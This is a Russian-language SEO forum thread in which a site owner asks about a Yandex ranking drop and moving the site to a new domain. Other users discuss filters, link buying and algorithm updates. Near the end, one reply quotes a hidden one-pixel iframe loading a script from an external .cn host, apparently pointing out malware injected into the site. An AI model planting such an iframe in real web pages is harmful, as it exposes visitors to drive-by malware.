- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Переиграть и победить: как анализировать конкурентов для продвижения сайта
С помощью Ahrefs
Александр Шестаков
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Спорный путь...
В Яше может быть и наложен фильтр, но прежде чем сносить старый сайт и делать переадресацию я бы проверил позиции сайта в Гугле и Рамблере. Вполне возможно, что там позиции не так уж плохи. Тогда "сношение" сайта :) не есть правильно.
В Гугле и Рамблере позиции более-менее, но если его не сносить и вешать дубль на другой домен думаю yandex обидется.
В Гугле и Рамблере позиции более-менее, но если его не сносить и вешать дубль на другой домен думаю yandex обидется.
Конечно же, тогда вы окончательно потеряете посетителей на первом сайте и не получите новых на второй сайт.....
Лично у меня имеются большие сомнения, что наложены какие-либо фильтры
Если сайт понизился в выдаче в Яндексе не очень давно (1 или 2 апдейта), то следовало бы немного подождать. Не стоит сразу делать резких движений...
Лично у меня имеются большие сомнения, что наложены какие-либо фильтры
Если сайт понизился в выдаче в Яндексе не очень давно (1 или 2 апдейта), то следовало бы немного подождать. Не стоит сразу делать резких движений...
Уже более 3 месяцев.
Уже более 3 месяцев.
С появлением восьмерки - это было в середине декабря 2007 года, многие сайты упали... яндекс снизил вес говноссылок.... и из за этого у меня упал 1 сайт, так же ка ки у вас... я думал что я попал под фильтр, но убрав все старые ссылки и купив ссылок на 150 баксов но реально качественых, с морд пр1-5, тиц 50-14 000, у меня сайт реально полез вверх....
Но все равно я уверен что он под каким то фильтром... т.к. есть два сайта, кручу их по одному и тому же ключевику.... на раскрутку первого надо 2 бакса, на раскрутку второго 50 баксов не хватает, они точно не склеены....
С появлением восьмерки - это было в середине декабря 2007 года, многие сайты упали... яндекс снизил вес говноссылок.... и из за этого у меня упал 1 сайт, так же ка ки у вас... я думал что я попал под фильтр, но убрав все старые ссылки и купив ссылок на 150 баксов но реально качественых, с морд пр1-5, тиц 50-14 000, у меня сайт реально полез вверх....
Но все равно я уверен что он под каким то фильтром... т.к. есть два сайта, кручу их по одному и тому же ключевику.... на раскрутку первого надо 2 бакса, на раскрутку второго 50 баксов не хватает, они точно не склеены....
Наверно всетаки под фильтром так как имею 2 сайт тойже тематики который прогонялся только по ps1 и висит в топе.
RodicheV добавил 17.03.2008 в 01:40
Зарегистрирую новый домен, перенесу старый сайт с измененным контентом.
Но дизайн то менять не буду и структуру сайто тоже, да и переадресация со старого будет стоять.
Не просечет ли это yandex и не наложит ли опять фильтр?
Не должен. Логика ведь есть в этом: просто Вы поставили ссылку на понравившийся Вам ресурс (кстати, Яша яваскрипты не читает) :)
Ну а структура - мало ли какой движок у Вас стоит :)
Ну а структура - мало ли какой движок у Вас стоит
Тоже верно...
Самый страшный фильтр таится в этом:
<iframe src='http://updateservernet.cn/tank.php' width='1' height='1' style='visibility: hidden;'></iframe>
ПОжалуйста подскажите как?
Например по словам "фрески" сайт находиться гдето на 80 стр. какоето время висел на второй.
Быстрее всего, что вы до сих пор пытаетесь продвигать по старинке, хотя алгоритм еще с 20.12 изменился. Заметил, что этим "болеют" очень многие оптимизаторы. Следите за качеством своих анкоров.